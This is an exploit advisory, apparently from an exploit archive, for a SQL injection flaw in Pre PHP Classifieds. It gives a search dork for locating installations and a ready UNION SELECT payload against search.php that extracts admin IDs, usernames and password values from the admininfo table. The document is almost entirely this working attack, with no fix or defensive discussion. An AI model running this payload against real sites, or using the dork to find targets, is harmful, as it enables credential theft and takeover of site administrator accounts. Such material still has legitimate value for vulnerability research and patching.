id: 12879
date: 06/22/2010
title: Pre PHP Classifieds SQL Injection Vulnerability
author: Sangteamtham
cves: 

===============================================
Pre PHP Classifieds SQL Injection Vulnerability
===============================================


> #######################################################################
> # Source: PHP Classifieds SQL injection Vulnerability
> # Download: http://preproject.com/products.asp
> # Dork : Power by PHP Classifieds
> # Author: Sangteamtham@gmail.com
> #
> #######################################################################
 
Exploit:
http://localhost/clas/search.php?category=999999 UNION SELECT
group_concat(adminid,0x3a,username,0x3a,password) from admininfo--



#  0day.today [2023-03-22]  #